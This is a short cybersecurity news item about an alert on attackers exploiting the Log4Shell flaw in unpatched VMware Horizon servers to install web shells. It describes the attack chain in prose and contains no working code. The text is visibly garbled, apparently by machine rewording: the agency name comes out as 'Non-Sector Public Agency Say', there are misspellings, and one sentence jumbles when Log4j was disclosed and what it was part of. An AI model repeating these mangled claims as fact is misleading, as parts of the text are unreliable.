NHS digital security team alerted to active exploitation of unpatched Log4Shell vulnerability VMware Horizon Servers drop malicious web shells by unknown threat actors and establish persistence on the affected network for subsequent attacks.
“The attack may include a reconnaissance phase where the attacker uses the Java Naming and Directory Interface (JNDI) to call back into the malicious infrastructure via the Log4Shell payload,” Non-Sector Public Agency Say in alert. “Once the vulnerability was discovered, the attack used Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injected a web shell into the VM Blast Secure Gateway service.”
Once deployed, a web shell can serve as a conduit to perform a number of post-exploitation activities, such as deploying additional malware, exposing data, or deploying ransomware. VMware Horizonn versions 7.x and 8.x are vulnerable to the Log4j vulnerability.
Log4Shell is an exploit for CVE-2021-44228 (CVSS Score: 10.0), a critical arbitrary remote code execution vulnerability in Apache Log4j 2, a ubiquitous open source logging framework that has been used since It was exposed in December 2021 as part of a different malware campaign. To date, a range of hacking groups from nation-state actors to ransomware cartels have exploited the vulnerability.
The development also marks the second time a VMware product has been exploited for a vulnerability in the Log4j library. Last month, AdvIntel researchers disclosed that attackers were targeting systems running VMware vCenter Server with the aim of installing the Conti ransomware.
For its part, VMware has Release security updates For Horizon, vCenter and other products affected by Log4Shell last month, the virtualization service provider acknowledged scan attempts in the wild, urging customers to install patches or temporarily apply workarounds where applicable to address any potential risks .
